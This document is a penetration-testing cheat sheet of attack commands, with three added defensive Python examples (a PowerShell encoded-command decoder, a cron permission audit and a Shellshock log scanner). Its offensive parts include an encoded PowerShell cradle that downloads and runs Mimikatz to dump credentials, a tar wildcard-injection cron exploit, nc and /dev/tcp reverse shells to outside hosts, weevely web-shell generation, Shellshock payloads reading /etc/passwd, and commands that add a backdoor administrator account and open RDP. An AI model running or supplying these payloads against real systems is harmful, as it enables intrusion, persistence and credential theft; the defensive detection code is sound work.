# Tricks

## Reverse Shell Tricks

### Spawning a TTY Shell

```bash
python -c 'import pty; pty.spawn("/bin/sh")'
```

From within Python

```bash
import os; os.system('/bin/bash')
```

```bash
/bin/sh -i
```

```bash
perl -e 'exec "/bin/sh";'
```

From within perl

```bash
exec "/bin/sh";
```

From within ruby

```bash
exec "/bin/sh"
```

From within lua

```bash
os.execute('/bin/sh')
```

From within IRB

```bash
exec "/bin/sh"
```

From within vi

```bash
:!bash
```

From within vi (alternative: change the shell vi uses, then open it)

```bash
:set shell=/bin/bash
:shell
```

From within nmap

```bash
!sh
```

### Double characters

Seeing every keystroke twice (the local and the remote side both echo)? Turn off local echo with:

```bash
stty raw -echo
```

### Shell upgrade

How to get a fully functional shell:

* Get a tty shell, e.g.:

  ```bash
  python -c "import pty;pty.spawn('/bin/bash')"
  ```
* Upgrade shell to a tty:

  ```bash
  SHELL=/bin/bash script -q /dev/null
  ```
* Set terminal:

  ```bash
  export TERM=xterm-256color
  ```
* Switch to the background with CTRL+Z.
* Configure local shell:

  ```bash
  stty raw -echo
  ```
* Change to the foreground with

  ```bash
  fg
  ```
* Reset the tty with

  ```bash
  reset
  ```

  Now we have a fully functional shell: CTRL+C terminates the remote process instead of the local nc.

## PowerShell Tricks

### Invoke-Mimikatz

```bash
cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzADsA"
```

The blob is base64 of the script in UTF-16LE (hence the `A` every other character); decoded, it is:

```bash
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
```
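Encoded command lines like the one above turn up in process-creation logs (Sysmon event 1, Windows event 4688) and have to be decoded before anyone can tell what they do. The decoder below is an added example, not part of the original notes and not Empire's code: it finds the `-EncodedCommand` argument (PowerShell accepts any unambiguous prefix, so `-e`, `-ec` and `-enc` all count), restores stripped `=` padding, decodes the UTF-16LE text and lists indicator strings found in the result. `PAGE_SAMPLE` is the command line shown above copied verbatim; the `INDICATORS` list is an assumption for triage, not a vetted signature set.

```python
from __future__ import annotations

import base64
import re

# powershell.exe -EncodedCommand (any unambiguous prefix works: -e, -ec, -enc, ...)
# takes the script as base64 of its UTF-16LE encoding, so an ASCII script
# shows up as the ..A..A..A.. pattern: every second byte is 0x00.
_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?P<flag>e[a-z]*)\s+(?P<b64>[A-Za-z0-9+/=]{8,})")

# Strings worth highlighting in a decoded script (assumed triage list, not a signature set).
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "Net.WebClient", "FromBase64String", "Invoke-Mimikatz")


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand blob; tolerates whitespace and trimmed '=' padding."""
    b64 = "".join(b64.split())            # logs sometimes wrap or break the blob
    b64 += "=" * (-len(b64) % 4)          # restore padding if it was stripped
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le", errors="replace")


def find_encoded_commands(cmdline: str) -> list[tuple[str, str]]:
    """Return (flag, decoded script) for every encoded-command argument in a command line."""
    found = []
    for m in _FLAG_RE.finditer(cmdline):
        flag = m.group("flag")
        # -e, -ec, -enc ... are prefixes of EncodedCommand; -ex / -ep (ExecutionPolicy) are not
        if not "encodedcommand".startswith(flag.lower()):
            continue
        found.append((flag, decode_encoded_command(m.group("b64"))))
    return found


def suspicious_indicators(script: str) -> list[str]:
    """Which INDICATORS occur in a decoded script (case-insensitive)."""
    lowered = script.lower()
    return [ind for ind in INDICATORS if ind.lower() in lowered]


# The command line from the notes above, verbatim.
PAGE_SAMPLE = (
    'cmd /c "powershell -enc '
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzADsA"
    '"'
)

if __name__ == "__main__":
    for flag, script in find_encoded_commands(PAGE_SAMPLE):
        print(f"-{flag}: {script}")
        print("indicators:", ", ".join(suspicious_indicators(script)))
```

The same function works on a raw `4688` command-line field or a Sysmon `CommandLine` value; anything decoded that pulls a script from the network and runs it in memory (`DownloadString` into `IEX`) deserves an alert regardless of which tool it then loads.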

## Ubuntu disable firewall

```bash
sudo ufw disable
```

## Cron job

Depending on how your Linux system is set up, you can look in:

```bash
/var/spool/cron/*   # user crontabs
/etc/crontab        # system-wide crontab
```

Also, many distros have:

```bash
/etc/cron.d/*       # same syntax as /etc/crontab
/etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly
```

These are simply directories that contain executables that are run hourly, daily, weekly or monthly, per their directory name. On top of that, you can have at jobs (check /var/spool/at/*) and anacron (/etc/anacrontab and /var/spool/anacron/*).

```bash
cat /etc/crontab
cat /etc/cron.daily/backup
```
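The locations above are where a scheduled job can be planted or hijacked, so the defender's question is which of the scripts cron runs could be edited by someone other than the job's owner. The audit below is an added example, not part of the original notes: it parses crontab text in both the system format (with a user column, as in /etc/crontab and /etc/cron.d) and the per-user format, stats every path-like word of each command, and reports regular files that are world- or group-writable, or, for root jobs, not owned by root. The sample crontabs, the `SAMPLE_FILES` table and `sample_stat` are constructed for the demonstration; on a real host leave `stat_fn` at its default `os.stat`.

```python
from __future__ import annotations

import os
import re
import shlex
import stat
from dataclasses import dataclass, field

# /etc/crontab and /etc/cron.d/* carry a user column after the five time fields
# (or after an @special); per-user crontabs in /var/spool/cron/* do not.
_ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


@dataclass
class CronEntry:
    schedule: str
    user: str
    command: str


@dataclass
class Finding:
    entry: CronEntry
    path: str
    reasons: list[str] = field(default_factory=list)


def parse_crontab(text: str, system_format: bool, default_user: str = "") -> list[CronEntry]:
    """Parse crontab text into entries, skipping comments, blanks and VAR=value lines."""
    entries: list[CronEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or _ENV_LINE.match(line):
            continue
        nfields = 1 if line.startswith("@") else 5      # @daily etc. vs. "m h dom mon dow"
        ncols = nfields + (2 if system_format else 1)    # plus user column, plus command
        parts = line.split(None, ncols - 1)              # the command keeps its own spaces
        if len(parts) < ncols:
            continue                                     # malformed line, cron would skip it too
        schedule = " ".join(parts[:nfields])
        user = parts[nfields] if system_format else default_user
        entries.append(CronEntry(schedule, user, parts[-1]))
    return entries


def path_words(command: str) -> list[str]:
    """Every word of the command that looks like a path: interpreter, script and arguments."""
    try:
        words = shlex.split(command)
    except ValueError:                 # unbalanced quotes
        words = command.split()
    return [w for w in words if "/" in w]


def writable_by_others(st: os.stat_result) -> list[str]:
    """Permission bits that let someone other than the owner change the file."""
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"group-writable (gid {st.st_gid})")
    return reasons


def audit_crontab(text: str, system_format: bool, stat_fn=os.stat,
                  default_user: str = "") -> list[Finding]:
    """Flag cron entries whose referenced regular files are writable by others."""
    findings: list[Finding] = []
    for entry in parse_crontab(text, system_format, default_user):
        for path in path_words(entry.command):
            try:
                st = stat_fn(path)
            except OSError:
                continue                   # an argument that is not a file, or absent
            if not stat.S_ISREG(st.st_mode):
                continue                   # directories, /dev/null, ...
            reasons = writable_by_others(st)
            if entry.user == "root" and st.st_uid != 0:
                reasons.append(f"owned by uid {st.st_uid}, not root")
            if reasons:
                findings.append(Finding(entry, path, reasons))
    return findings


# Constructed samples so the audit runs offline (not taken from any real host).
SAMPLE_SYSTEM_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  2    * * *   root    /bin/sh /opt/scripts/backup.sh > /dev/null 2>&1
@reboot         root    /usr/local/bin/agent --start
"""
SAMPLE_USER_CRONTAB = "@daily /home/alice/bin/sync.sh\n*/5 * * * * /home/alice/bin/poll.sh --quiet\n"

SAMPLE_FILES = {  # path -> (mode, uid, gid)
    "/": (stat.S_IFDIR | 0o755, 0, 0),
    "/etc/cron.hourly": (stat.S_IFDIR | 0o755, 0, 0),
    "/bin/sh": (stat.S_IFREG | 0o755, 0, 0),
    "/opt/scripts/backup.sh": (stat.S_IFREG | 0o777, 0, 0),      # the misconfiguration
    "/dev/null": (stat.S_IFCHR | 0o666, 0, 0),
    "/usr/local/bin/agent": (stat.S_IFREG | 0o755, 0, 0),
    "/home/alice/bin/sync.sh": (stat.S_IFREG | 0o664, 1000, 1000),
    "/home/alice/bin/poll.sh": (stat.S_IFREG | 0o700, 1000, 1000),
}


def sample_stat(path: str) -> os.stat_result:
    """stat() stand-in backed by SAMPLE_FILES (constructed, not a real filesystem)."""
    if path not in SAMPLE_FILES:
        raise FileNotFoundError(path)
    mode, uid, gid = SAMPLE_FILES[path]
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))


if __name__ == "__main__":
    for f in (audit_crontab(SAMPLE_SYSTEM_CRONTAB, True, sample_stat)
              + audit_crontab(SAMPLE_USER_CRONTAB, False, sample_stat, default_user="alice")):
        print(f"[{f.entry.user}] {f.entry.schedule} {f.entry.command!r}: {f.path}: {', '.join(f.reasons)}")
```

Run it over /etc/crontab and every file in /etc/cron.d with `system_format=True`, and over each /var/spool/cron/* file with `system_format=False` and that user's name. The run-parts directories (/etc/cron.hourly and friends) are not crontabs; list them and apply `writable_by_others` to each file directly. The remedy for a hit is `chmod o-w,g-w` on the script and, for root jobs, `chown root:` on it.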

1. ```bash
   echo "mkfifo /tmp/she; nc 127.0.0.1 9999 0</tmp/she | /bin/sh > /tmp/she 2>&1; rm /tmp/she" > shell.sh && chmod +x shell.sh
   echo "" > "--checkpoint-action=exec=sh shell.sh"
   echo "" > --checkpoint=1
   ```

   ```bash
   nc -lvnp 9999
   ```
2. ```bash
   ls /etc/cron.daily
   ```

### Cron file

Append a line to the script that the cron job runs (here /tab/script.sh):

```bash
echo 'rm -rf /tmp/p; mknod /tmp/p p; /bin/bash 0</tmp/p | nc 192.168.30.128 1234 >/tmp/p' >> /tab/script.sh
```

## Search for interesting files

```bash
find / -name ".*" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null
```

```bash
find -name ".bash_history" -path "/home/*" -exec cat {} \;
```

```bash
find / -user USERtoUSE 2>/dev/null
```

Look for files owned by root that we could write to. To reduce false positives, only look for files (not symlinks) and exclude proc, which is full of root-owned writable files.

```bash
find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null
```

### SUID

```bash
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
```

```bash
find / -type f -perm -o+w 2>/dev/null | grep -Ev '(proc|sys|www)'
```

## weevely

Generate the agent (password: mysecret):

```bash
weevely generate mysecret ~/Desktop/mydoor.php
```

Run a single command through the uploaded agent, or open an interactive session:

```bash
weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mysecret ls
weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mysecret
```

## Port knocking with nc

```bash
nc -z 192.168.110.101 7000 8000 9000
```

## Shellshock

Over SSH:

```bash
ssh -i noob noob@192.168.40.132 '() { :;}; /bin/bash'
```

Against a CGI script, with wget:

```bash
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/id" http://sokar:591/cgi-bin/cat ; cat cat
```

The same with curl:

```bash
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://172.16.66.137:591/cgi-bin/cat
```

Egress filter:

```bash
User-Agent: () { :;};echo;/bin/echo '/bin/bash -i >& /dev/tcp/192.168.221.139/51242 0>&1 ' > /home/bynarr/.profile;
```
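Every payload above starts with the same fixed prefix, because bash only ran the injection when a variable's value began with a function definition of the form `() {`. That makes the attack cheap to spot in CGI access logs. The scanner below is an added example, not part of the original notes: it parses combined-format access-log lines, percent-decodes the request line, and reports any field containing `() { ... };`. `SAMPLE_LOG` is constructed for the demonstration and includes a benign page whose query string mentions bash function syntax, to show what does not trigger.

```python
from __future__ import annotations

import re
from typing import NamedTuple
from urllib.parse import unquote

# Vulnerable bash versions treated any environment variable whose value began
# with "() {" as an exported function definition and kept executing whatever
# followed the closing "};".  CGI servers copy request headers into environment
# variables (HTTP_USER_AGENT, HTTP_REFERER, ...), which is why the probes in the
# section above carry the payload in User-Agent.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache/nginx "combined" log format; a quote inside a field is logged as \"
_FIELD = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>' + _FIELD + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + _FIELD + r')" "(?P<ua>' + _FIELD + r')"'
)


class Hit(NamedTuple):
    line_no: int
    field: str
    value: str


def is_shellshock_probe(value: str) -> bool:
    """True if a header or environment value carries a bash function-definition injection."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_access_log(lines: list[str]) -> list[Hit]:
    """Return every (line, field) in combined-log-format input that carries the pattern."""
    hits: list[Hit] = []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would report unparsable lines
        fields = {
            # the request line is percent-encoded on the wire, so decode it before matching
            "request": unquote(m.group("request")),
            "referer": m.group("referer"),
            "ua": m.group("ua"),
        }
        for name, value in fields.items():
            if is_shellshock_probe(value):
                hits.append(Hit(line_no, name, value))
    return hits


# Constructed sample lines (not real traffic): a benign request, two probes in the
# shapes shown in the section above, and a benign page about bash functions.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [10/Oct/2014:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '10.0.0.9 - - [10/Oct/2014:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { test;};/usr/bin/id" "curl/7.35.0"',
    '10.0.0.7 - - [10/Oct/2014:13:56:02 +0000] "GET /docs/functions.html?q=f()%20{%20echo%20hi%3B%20} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: shellshock pattern in {hit.field}: {hit.value!r}")
```

The pattern covers the User-Agent and Referer forms shown above; headers the web server does not log (Cookie, custom X- headers) need the same check at the WAF or in a full request capture. Detection is triage only: the fix is a patched bash and not dispatching CGI through a shell in the first place.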

## Quick add Admin and RDP

```bash
net user /add caiom MySecurePassword158!
```

```bash
net localgroup administrators caiom /add
```

Enable Remote Desktop (RDP) in the registry:

```bash
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
```

Configure the firewall to let RDP connections in.

```bash
netsh firewall set service remoteadmin enable
```

```bash
netsh firewall set service remotedesktop enable
```

Now use rdesktop on Kali to log in to your newly minted account.

```bash
rdesktop <IP>
```

### Nmap list scripts (here the SMB ones)

```bash
ls -l /usr/share/nmap/scripts/smb*
```

## Forward traffic from a laptop's wlan0 to eth0

**PC**

Assign an IP address to eth0 (here 192.168.56.1):

```bash
ifconfig eth0 192.168.56.1 netmask 255.255.255.0
```

Enable IP forwarding

```bash
sysctl -w net.ipv4.ip_forward=1
```

Forward packets from eth0 to wlan0

```bash
iptables -A FORWARD --in-interface eth0 -j ACCEPT
```

```bash
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
```

**Device connected to PC**

Set an IP address on eth0 and add the PC as the default gateway:

```bash
ifconfig eth0 192.168.56.2 netmask 255.255.255.0
```

```bash
route add default gw 192.168.56.1
```

## Kudos, References and Further Reading

* <https://gtfobins.github.io/>
* <https://netsec.ws/?p=337>
